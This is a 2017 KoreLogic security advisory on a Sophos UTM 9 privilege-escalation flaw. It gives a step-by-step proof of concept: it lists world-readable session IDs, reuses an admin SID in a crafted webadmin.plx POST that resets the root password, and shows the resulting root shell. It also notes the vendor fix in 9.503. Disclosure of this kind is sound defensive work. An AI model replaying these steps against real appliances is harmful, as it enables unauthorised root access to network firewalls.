Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions

Vulnerability Description

The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, it is possible to list a directory containing a sub-directories whose names are valid session identifiers (SID) and can be used to make requests on behalf of other accounts, such as admin. This allows for escalation to root privilege.

Technical Description

1. Obtain the a privileged session token.

	$ ssh loginuser@1.3.3.7
	loginuser@1.3.3.7's password:

	Sophos UTM
	(C) Copyright 2000-2016 Sophos Limited and others. All rights reserved.
	Sophos is a registered trademark of Sophos Limited and Sophos Group.
	All other product and company names mentioned are trademarks or registered
	trademarks of their respective owners.

	For more copyright information look at /doc/astaro-license.txt
	or http://www.astaro.com/doc/astaro-license.txt

	NOTE: If not explicitly approved by Sophos support, any modifications
	      done by root will void your support.

	loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/
	loginuser@[redacted]:/var/confd/var/sessions > ls -la
	total 40
	drwxr-xr-x 2 root root 4096 Mar 23 14:53 .
	drwxr-xr-x 5 root root 4096 Mar 19 16:06 ..
	-rw-r--r-- 1 root root  359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC
	-rw-r--r-- 1 root root    5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock
	-rw-r--r-- 1 root root  369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk
	-rw-r--r-- 1 root root   35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock
	-rw-r--r-- 1 root root  367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP
	-rw-r--r-- 1 root root   10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock
	-rw-r--r-- 1 root root  370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN
	-rw-r--r-- 1 root root    5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock

2. Set the root password.

	POST /webadmin.plx HTTP/1.1
	Host: 1.3.3.7:4444
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
	Accept: text/javascript, text/html, application/xml, text/xml, */*
	Accept-Language: en-US,en;q=0.5
	X-Requested-With: XMLHttpRequest
	X-Prototype-Version: 1.5.1.1
	Content-Type: application/json; charset=UTF-8
	Referer: https://1.3.3.7:4444/
	Content-Length: 418
	Cookie: SID=xZzeOIhVClqKYsmCKHrN
	DNT: 1
	Connection: close

	{"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

	HTTP/1.1 200 OK
	Date: Thu, 23 Mar 2017 14:57:19 GMT
	Server: Apache
	Expires: Thursday, 01-Jan-1970 00:00:01 GMT
	Pragma: no-cache
	X-Frame-Options: SAMEORIGIN
	X-Content-Type-Option: nosniff
	X-XSS-Protection: 1; mode=block
	Vary: Accept-Encoding
	Connection: close
	Content-Type: application/json; charset=utf-8
	Content-Length: 24690

	{"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",
	[snip]
	"_cookie":null,"wdebug":0}

3. Look for success message.

	"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

4. Profit.

	loginuser@[redacted]:/home/login > su
	Password:
	[redacted]:/home/login # id
	uid=0(root) gid=0(root) groups=0(root),890(xorp)

Mitigation and Remediation Recommendation

The vendor has addressed this vulnerability in version 9.503. Release notes and download instructions can be found at: https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt